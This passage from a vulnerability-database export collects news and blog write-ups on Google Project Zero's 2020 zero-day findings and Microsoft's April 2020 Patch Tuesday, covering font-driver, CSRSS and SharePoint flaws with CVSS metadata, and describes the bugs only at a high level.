[post-exploitation on Android devices.](<https://googleprojectzero.blogspot.com/2021/01/in-wild-series-android-post-exploitation.html>) In that case, additional payloads were delivered that collected device fingerprinting information, location data, a list of running processes and a list of installed applications for the phone.\n\n## Zero-Day Bugs\n\nThe researchers posted [root-cause analyses ](<https://googleprojectzero.blogspot.com/p/rca.html>)for each of the four Windows zero-day vulnerabilities that they discovered being leveraged in their attacks.\n\nThe first, [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/cve-2020-6418-chrome-incorrect-side.html>), is a type confusion bug prior to 80.0.3987.122 leading to remote-code execution. It exists in V8 in Google Chrome (Turbofan), which is the component used for processing JavaScript code. It allows a remote attacker to potentially cause heap corruption via a crafted HTML page.\n\nThe second, [CVE-2020-0938](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938>), is a a trivial stack-corruption vulnerability in the Windows Font Driver. It can be triggered by loading a Type 1 font that includes a specially crafted BlendDesignPositions object. In the attacks, it was chained with [CVE-2020-1020,](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1020>) another Windows Font Driver flaw, this time in the processing of the VToHOrigin PostScript font object, also triggered by loading a specially crafted Type 1 font. Both were used for privilege escalation.\n\n\u201cOn Windows 8.1 and earlier versions, the vulnerability was chained with [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1020>) (a write-what-where condition) to first set up a second stage payload in RWX kernel memory at a known address, and then jump to it through this bug,\u201d according to Google. \u201cThe exploitation process was straightforward because of the simplicity of the issue and high degree of control over the kernel stack. The bug was not exploited on Windows 10.\u201d\n\nAnd finally, [CVE-2020-1027](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027>) is a Windows heap buffer overflow in the Client/Server Run-Time Subsystem (CSRSS), which is an essential subsystem that must be running in Windows at all times. The issue was used as a sandbox escape in a browser exploit chain using, at times, all four vulnerabilities.\n\n\u201cThis vulnerability was used in an exploit chain together with a 0-day vulnerability in Chrome (CVE-2020-6418). For older OS versions, even though they were also affected, the attacker would pair CVE-2020-6418 with a different privilege escalation exploit (CVE-2020-1020 and CVE-2020-0938).\u201d\n\nAll have all since been patched.\n\n## Advanced Capabilities\n\nFrom their understanding of the attacks, researchers said that threat actors were operating a \u201ccomplex targeting infrastructure,\u201d though, curiously, they didn\u2019t use it every time.\n\n\u201cIn some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox,\u201d according to researchers. \u201cIn these cases, the attacker took a slower approach: sending back dozens of parameters from the end user\u2019s device, before deciding whether or not to continue with further exploitation and use a sandbox escape.\u201d\n\nStill other attack scenarios showed attackers choosing to fully exploit a system straightaway; or, not attempting any exploitation at all, researchers observed. \u201cIn the time we had available before the servers were taken down, we were unable to determine what parameters determined the \u2018fast\u2019 or \u2018slow\u2019 exploitation paths,\u201d according to the post.\n\nOverall, whoever was behind the attacks designed the exploit chains to be used modularly for efficiency and flexibility, showing clear evidence that they are experts in what they do, researchers said.\n\n\u201cThey [use] well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks,\u201d according to the post.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** _Is your company\u2019s software supply-chain prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET._\n", "cvss3": {}, "published": "2021-01-13T16:57:39", "type": "threatpost", "title": "Sophisticated Hacks Against Android, Windows Reveal Zero-Day Trove", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-6418"], "modified": "2021-01-13T16:57:39", "id": "THREATPOST:88098D30DA04E912B06C03B52556385C", "href": "https://threatpost.com/hacks-android-windows-zero-day/163007/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:51:25", "description": "Microsoft has released its April 2020 Patch Tuesday security updates, its first big patch update released since the [work-from-home era](<https://threatpost.com/malware-risks-triple-for-remote-workers/154735/>) truly got underway. It\u2019s a doozie, with the tech giant disclosing 113 vulnerabilities.\n\nOut of these, 19 are rated as critical, and 94 are rated as important. Crucially, four of the vulnerabilities are being exploited in the wild; and two of them were previously publicly disclosed.\n\nIn all, [the update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) includes patches for Microsoft Windows, Microsoft Edge (EdgeHTML-based and the Chromium-based versions), ChakraCore, Internet Explorer, Microsoft Office and Microsoft Office Services and Web Apps, Windows Defender, Visual Studio, Microsoft Dynamics, and Microsoft Apps for Android and Mac. They run the gamut from information disclosure and privilege escalation to remote code execution (RCE) and cross-site scripting (XSS).\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft has seen a 44 percent increase year-over-year in the number of CVEs patched between January to April, according to Trend Micro\u2019s Zero Day Initiative (ZDI) \u2013 a likely result of an increasing number of researchers looking for bugs and an expanding portfolio of supported products. In March, Patch Tuesday [contained 115 updates](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>); in February, Microsoft [patched 99 bugs](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>); and in January, it [tackled 50 flaws](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>).\n\nAlso for this week, Oracle [patched a whopping 405 security vulnerabilities](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>) \u2013 while on the other end of the spectrum, Adobe went light, with [only five CVEs](<https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/>) addressed for April.\n\n**Bugs Under Active Exploit**\n\nOn the zero-day front, Microsoft patched [CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>), a critical-level memory-corruption vulnerability in Internet Explorer that was exploited in the wild. The bug allows RCE, and exists due to the improper handling of objects in memory by the scripting engine.\n\n\u201cThere are multiple scenarios in which this vulnerability could be exploited,\u201d Satnam Narang, principal research engineer at Tenable, told Threatpost. \u201cThe primary way would be to socially engineer a user into visiting a website containing the malicious code, whether owned by the attacker, or a compromised website with the malicious code injected into it. An attacker could also socially engineer the user into opening a malicious Microsoft Office document that embeds the malicious code.\u201d\n\nChris Hass, director of information security and research for Automox, told Threatpost that CVE-2020-0968 is a perfect vulnerability for use for drive-by compromise.\n\n\u201cIf the current user is logged in as admin, an attacker could host a specially crafted website, hosting this vulnerability, once the unpatched user navigates the malicious site, the attacker could then exploit this bug, allowing the attacker to gain remote access the host,\u201d he explained. \u201cThis bug would allow the attacker to view, change, delete data or even install ransomware.\u201d\n\nAlthough the scope of this vulnerability is somewhat limited because IE has seen a steady decline in user-base, it still remains an attractive vector for cybercriminals, Hass added.\n\nMeanwhile, two of the actively exploited bugs are important-rated RCE issues related to the Windows Adobe Type Manager Library.\n\nThe first, [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), was already made public. It arises because the library improperly handles a specially-crafted multi-master font, the Adobe Type 1 PostScript format.\n\n\u201cAttackers can use this vulnerability to execute their code on affected systems if they can convince a user to view a specially crafted font,\u201d according to Dustin Childs, with ZDI, in a [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/4/14/the-april-2020-security-update-review>). \u201cThe code would run at the level of the logged-on user.\u201d\n\nThe related bug is the zero-day [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), an RCE vulnerability that impacts an OpenType font renderer within Windows. Again, an attacker could execute code on a target system if a user viewed a specially crafted font.\n\nThough the two are related, \u201cthere is currently no confirmation that the two are related to the same set of in-the-wild attacks,\u201d Narang told Threatpost. As for attack vector, \u201cto exploit these flaws, an attacker would need to socially engineer a user into opening a malicious document or viewing the document in the Windows Preview pane,\u201d he added.\n\nBoth of these bugs have been used for Windows 7 systems \u2013 and Childs noted that not all Windows 7 systems will receive a patch since the OS left support in January of this year.\n\nThe final actively exploited bug \u2013 also not previously publicly disclosed \u2013 is [CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>), which exists in the way that the Windows Kernel handles objects in memory. \u201cAn attacker who successfully exploited the vulnerability could execute code with elevated permissions,\u201d according to Microsoft, which labeled the flaw \u201cimportant.\u201d\n\nTo exploit the vulnerability, a locally authenticated attacker would need to run a specially crafted application.\n\n**Other Priority Patches**\n\nMicrosoft also patched several notable other bugs that researchers said admins should prioritize in the large update.\n\n[CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>) is the second previously disclosed issue, an important-rated privilege-elevation vulnerability found in OneDrive for Windows. It exists due to improper handling of symbolic links (shortcut links), and exploitation would allow an attacker to further compromise systems, execute additional payloads that may need higher privileges to be effective, or gain access to personal or confidential information that was not available previously.\n\n\u201cAn attacker that has gained access to an endpoint could use OneDrive to overwrite a targeted file, leading to an elevated status,\u201d Hass told Threatpost. \u201cOneDrive is extremely popular and often installed by default on Windows 10. When you combine this with remote work, and the ever-growing use of personal devices for remote work, it makes the potential scope for this vulnerability pretty high.\u201d\n\nZDI\u2019s Childs also flagged an important-rated Windows DNS denial-of-service (DoS) bug, [CVE-2020-0993](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0993>), which affects client systems.\n\n\u201cAn attacker could cause the DNS service to be nonresponsive by sending some specially crafted DNS queries to an affected system,\u201d Childs wrote. \u201cConsidering the damage that could be done by an unauthenticated attacker, this should be high on your test and deploy list.\u201d\n\nAnother, [CVE-2020-0981](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0981>), is an important-rated Windows token security feature bypass vulnerability that comes from Windows improperly handling token relationships in Windows 10 version 1903 and higher.\n\n\u201cIt\u2019s not often you see a security feature bypass directly result in a sandbox escape, but that\u2019s exactly what this bug allows,\u201d Childs explained. \u201cAttackers could abuse this to allow an application with a certain integrity level to execute code at a different \u2013 presumably higher \u2013 integrity level.\u201d\n\n**Critical SharePoint Bugs**\n\nSharePoint, a web-based collaborative platform that integrates with Microsoft Office, is often used as a document management and storage system. The platform saw its share of critical problems this month, including four critical RCE bugs, which arise from the fact that the software does not check the source markup of an application package, according to [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>).\n\nThe bug tracked as [CVE-2020-0929](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0929>) paves the way for RCE and affects Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 Service Pack 2, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019.\n\nA second critical bug ([CVE-2020-0931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0931>)) also would allow RCE; it affects Microsoft Business Productivity Servers 2010 Service Pack 2, Microsoft SharePoint Enterprise Server 2013 Service Pack 1, Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1, and Microsoft SharePoint Server 2019.\n\nYet another RCE problem ([CVE-2020-0932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0932>)) impacts Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2013 Service Pack 1 and Microsoft SharePoint Server 2019; and [CVE-2020-0974](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0974>) affects Microsoft SharePoint Enterprise Server 2016 and Microsoft SharePoint Server 2019.\n\nFor all of the RCE bugs, \u201can attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account,\u201d Microsoft said in the individual bug advisories. An attacker could exploit any of them by uploading a specially crafted SharePoint application package to an affected version of SharePoint.\n\nSharePoint also harbors a fifth critical bug, [CVE-2020-0927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0927>). This is an XSS flaw that affects Microsoft SharePoint Server 2019 and Enterprise Server 2016 and would allow spoofing.\n\n**Not One to Skip Amidst WFH**\n\nEven though IT and security organizations are already strained with the added stress of the sudden shift to remote working in the face of the coronavirus pandemic, April\u2019s Patch Tuesday is not one to skip, Richard Melick, senior technical product manager at Automox, told Threatpost \u2014 least of all given the four actively exploited bugs.\n\n\u201cFrom increasingly diverse technological environments to a list of unknown connectivity factors, IT and SecOps managers need to create a deployment plan that addresses today\u2019s zero-day, exploited and critical vulnerabilities within 24 hours and the rest within 72 hours in order to stay ahead of weaponization,\u201d he advised. \u201cHackers are not taking time off; they are working just as hard as everyone else.\u201d\n\nMelick also said that the consequences of exploitation could be exacerbated given the [work-from-home (WFH) lapses in security](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) that may be present.\n\n\u201cWith today\u2019s remote workforce environment and the necessity of sharing documents through email or file share, all it takes is one phishing email, malicious website or exploited document to open the door for an attacker,\u201d he said. \u201cOnce in, a malicious party would have the ability to modify data, install backdoors or new software, or gain full user rights accounts. While older versions of Windows are more susceptible to both exploits, the adoption rate of Windows 10 is only a little above 50 percent, leaving more than enough targets for attackers.\u201d\n\nTeams should be ready for plenty of overhead in terms of the patching work involved, added Jonathan Cran, head of research at Kenna Security.\n\n\u201cGiven the shift to remote work for many organizations in combination with the current patch load from Oracle\u2019s update earlier this week and what looks like a backlog of patching, this looks like a busy month for many security teams,\u201d Cran told Threatpost. \u201cWe have yet to see how work from home impacts patching rates, but for security teams, installing numerous patches on remote employee laptops, likely via a corporate VPN to the Windows Server Update Services or Microsoft System Center Configuration Manager, will be a resource- and time-intensive endeavor.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-14T19:45:49", "type": "threatpost", "title": "April Patch Tuesday: Microsoft Battles 4 Bugs Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0927", "CVE-2020-0929", "CVE-2020-0931", "CVE-2020-0932", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0974", "CVE-2020-0981", "CVE-2020-0993", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T19:45:49", "id": "THREATPOST:310514802AFEB1D9D3CB611D5E2B576A", "href": "https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2020-04-18T09:42:02", "description": "**Microsoft** today released updates to fix 113 security vulnerabilities in its various **Windows** operating systems and related software. Those include at least three flaws that are actively being exploited, as well as two others which were publicly detailed prior to today, potentially giving attackers a head start in figuring out how to exploit the bugs.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2014/07/brokenwindows.png)Nineteen of the weaknesses fixed on this Patch Tuesday were assigned Microsoft's most-dire \u201ccritical\u201d rating, meaning malware or miscreants could exploit them to gain complete, remote control over vulnerable computers without any help from users.\n\nNear the top of the heap is [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), a remotely exploitable bug in the **Adobe Font Manager** library that was first detailed in late March when Microsoft said it had seen the flaw being used in active attacks.\n\nThe Adobe Font Manager library is the source of yet another zero-day flaw -- [CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>) -- although experts at security vendor **Tenable** say there is currently no confirmation that the two are related to the same set of in-the-wild attacks. Both flaws could be exploited by getting a Windows users to open a booby-trapped document or viewing one in the Windows Preview Pane.\n\nThe other zero-day flaw ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) affects **Windows 7** and **Windows 10 systems**, and earned a slightly less dire \"important\" rating from Microsoft because it's an \"elevation of privilege\" bug that requires the attacker to be locally authenticated.\n\nMany security news sites are reporting that Microsoft addressed a total of four zero-day flaws this month, but it appears the advisory for a critical Internet Explorer flaw ([CVE-2020-0968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0968>)) has been revised to indicate Microsoft has not yet received reports of it being used in active attacks. However, the advisory says this IE bug is likely to be exploited soon.\n\nResearchers at security firm **Recorded Future** zeroed in on [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>), a critical vulnerability dubbed \"SMBGhost\" that was rumored to exist in last month's Patch Tuesday but for which an out-of-band patch wasn't released until March 12. The problem resides in a file-sharing component of Windows, and could be exploited merely by sending the victim machine specially-crafted data packets. Proof-of-concept code showing how to exploit the bug was released April 1, but so far there are no indications this method has been incorporated into malware or active attacks.\n\nRecorded Future's **Allan Liska** notes that one reason these past few months have seen so many patches from Microsoft is the company [recently hired \"SandboxEscaper,\"](<https://twitter.com/SandboxBear/status/1210133985478791171>) a nickname used by the security researcher responsible for [releasing more than a half-dozen zero-day flaws](<https://arstechnica.com/information-technology/2019/05/serial-publisher-of-windows-0days-drops-exploits-for-3-more-unfixed-flaws/>) against Microsoft products last year.\n\n\"SandboxEscaper has made several contributions to this month\u2019s Patch Tuesday,\" Liska said. \"This is great news for Microsoft and the security community at large.\"\n\nOnce again, Adobe has blessed us with a respite from updating its Flash Player program with security fixes. I look forward to the end of this year, when the company has promised to sunset this buggy and insecure program once and for all. Adobe did release security updates for its [ColdFusion, After Effects and Digital Editions software](<https://blogs.adobe.com/psirt/?p=1859>).\n\nSpeaking of buggy software platforms, **Oracle** has released a quarterly patch update to fix more than 400 security flaws across multiple products, including its **Java SE** program. If you've got Java installed and you need/want to keep it installed, please [make sure it's up-to-date](<https://java.com/en/download/help/java_update.xml#manual>).\n\nNow for my obligatory disclaimers. Just a friendly reminder that while many of the vulnerabilities fixed in today\u2019s Microsoft patch batch affect Windows 7 operating systems -- including all three of the zero-day flaws -- this OS is no longer being supported with security updates (unless you\u2019re an enterprise taking advantage of Microsoft\u2019s [paid extended security updates program](<https://support.microsoft.com/en-us/help/4527878/faq-about-extended-security-updates-for-windows-7>), which is available to Windows 7 Professional and Windows 7 enterprise users).\n\nIf you rely on Windows 7 for day-to-day use, it\u2019s to think about upgrading to something newer. That something might be a computer with Windows 10. Or maybe you have always wanted that shiny MacOS computer.\n\nIf cost is a primary motivator and the user you have in mind doesn\u2019t do much with the system other than browsing the Web, perhaps a **Chromebook** or an older machine with a recent version of **Linux** is the answer (Ubuntu may be easiest for non-Linux natives). Whichever system you choose, it\u2019s important to pick one that fits the owner\u2019s needs and provides security updates on an ongoing basis.\n\nKeep in mind that while staying up-to-date on Windows patches is a must, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re not losing your mind when the odd buggy patch causes problems booting the system.\n\nSo do yourself a favor and backup your files before installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, keep an eye on the [AskWoody blog](<https://www.askwoody.com/2020/february-2020-patch-tuesday-foibles/>) from **Woody Leonhard**, who keeps a close eye on buggy Microsoft updates each month.\n\nFurther reading:\n\n[Qualys breakdown on April 2020 Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/04/14/april-2020-patch-tuesday-113-vulns-19-critical-0-day-patches-sharepoint-adobe-coldfusion>)\n\n[SANS Internet Storm Center on Patch Tuesday](<https://isc.sans.org/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/>)", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-14T22:24:10", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-14T22:24:10", "id": "KREBS:1093D39181F7F724932AED0E8DA017A8", "href": "https://krebsonsecurity.com/2020/04/microsoft-patch-tuesday-april-2020-edition/", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:31", "description": "[![Windows Update](https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg)](<https://thehackernews.com/images/-YJ1LqrMMEaM/XpX_UksqOuI/AAAAAAAA2qE/3LZJABtjRK0FvjSyceDePk_slKHxeWYmACLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nIt's **April 2020 Patch Tuesday**, and during these challenging times of coronavirus pandemic, this month's patch management process would not go easy for many organizations where most of the resources are working remotely. \n \nMicrosoft today [released](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Apr>) the latest batch of software security updates for all supported versions of its Windows operating systems and other products that patch a total of 113 new security vulnerabilities, 17 of which are critical and 96 rated important in severity. \n \n\n\n## Patches for 4 Zero-Days Exploited In the Wild\n\n \nMost importantly, [two of the security flaws](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>) have been reported as being publicly known at the time of release, and the 3 are being actively exploited in the wild by hackers. \n \nOne of the publicly disclosed flaws, which was also exploited as zero-day, resides in the Adobe Font Manager Library used by Windows, the existence of which Microsoft revealed last month within an early security warning for its millions of users. \n \nTracked as [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>), the remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. \n \nAs explained in the [previous post](<https://thehackernews.com/2020/03/windows-adobe-font-vulnerability.html>), the affected font library not only parses content when open with a 3rd-party software but also is used by Windows Explorer to display the content of a file in the 'Preview Pane' or 'Details Pane' without having users to open it. \n \nThe second in-the-wild exploited remote code execution flaw ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>)) also resides in the Adobe Type Manager Library that triggers when parsing a malicious OpenType font. \n \nBoth of these zero-day flaws were [reported](<https://twitter.com/itswillis/status/1250116355602419713>) to Microsoft in the last week of March by researchers working with Google Project Zero but with a very short full disclosure deadline, which was then mutually extended considering the current global circumstances. \n \nThe third zero-day is an elevation of privilege vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in Windows kernel, discovered by the Google Project Zero team, that impacts all supported versions of the Windows operating system\u2014including Windows 10, 8.1 and Server 2008, 2012, 2016, and 2019 editions, as well as Windows 7 for which Microsoft ended its support in January 2020. \n \n\n\n## Other New Bugs Microsoft Patched this Month\n\n \nThe second publicly known issue, which was not exploited in the wild, is an important elevation of privilege vulnerability ([CVE-2020-0935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0935>)) that resides in the OneDrive for Windows desktop. \n \nThe latest update also includes patches for 5 critical flaws that affect Microsoft Office SharePoint, 4 of which exists due to the failure of the software to check the source markup of an application package, allowing remote attackers to execute arbitrary code on the affected machines. \n \nWhereas, the 5th SharePoint flaw is a cross-site-scripting (XSS) issue (**CVE-2020-0927**) that can be exploited by an authenticated attacker by sending a specially crafted request to an affected SharePoint server. \n \nThere's another notable flaw, tracked as **CVE-2020-0910 **and rated critical, that affects Windows Hyper-V, allowing a guest virtual machine to compromise the hypervisor, escaping from a guest virtual machine to the host, or escaping from one guest virtual machine to another guest virtual machine. \n \nBesides these, other critical flaws Microsoft patched this month affect Chakra scripting engine, Microsoft Dynamics 365 Business Central, media foundation, graphics components, codecs library and VBScript\u2014all leading to remote code execution attacks. \n \nWindows users and system administrators are highly advised to apply the latest security patches as soon as possible in an attempt to keep cybercriminals and hackers away from taking control of their computers. \n \nFor installing the latest Windows security updates, you can head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates on your PC, or you can install the updates manually. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T18:24:00", "type": "thn", "title": "Microsoft Issues Patches for 3 Bugs Exploited as Zero-Day in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0910", "CVE-2020-0927", "CVE-2020-0935", "CVE-2020-0938", "CVE-2020-1020", "CVE-2020-1027"], "modified": "2020-04-15T11:05:48", "id": "THN:D8AAE3E21499FA77C4C1B73C1DDA01E1", "href": "https://thehackernews.com/2020/04/windows-patch-update.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2020-06-03T17:50:28", "description": "This month\u2019s Microsoft Patch Tuesday addresses 113 vulnerabilities with 19 of them labeled as Critical. The 19 Critical vulnerabilities cover Adobe Font Manager Library (0-day), SharePoint, Hyper-V, Scripting Engines, Media Foundation, Microsoft Graphics, Windows Codecs, and Dynamics Business Central. Adobe released patches today for ColdFusion, After Effects, and Digital Editions.\n\n### Workstation Patches\n\nThe Scripting Engine, Adobe Font Manager Library, Media Foundation, Microsoft Graphics, and Windows Codecs patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Windows Kernel Privilege Escalation\n\nWhile listed as Important, there is also an Actively Attacked privilege escalation vulnerability ([CVE-2020-1027](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1027>)) in the Windows Kernel. Often privilege escalation vulnerabilities are \"chained\" with other vulnerabilities resulting in a full system compromise. This patch should be prioritized across all Windows devices.\n\n### Adobe Font Manager Library 0-day\n\nMicrosoft patched two Actively Attacked vulnerabilities ([CVE-2020-0938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938>), [CVE-2020-1020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020>)) in the Adobe Font Manager Library that were [announced](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/25/automatically-discover-prioritize-and-remediate-windows-adobe-type-manager-library-remote-code-execution-vulnerability-adv200006-using-qualys-vmdr>) in March. While Windows 10 systems are partially mitigated against the exploit, all Windows workstations should be 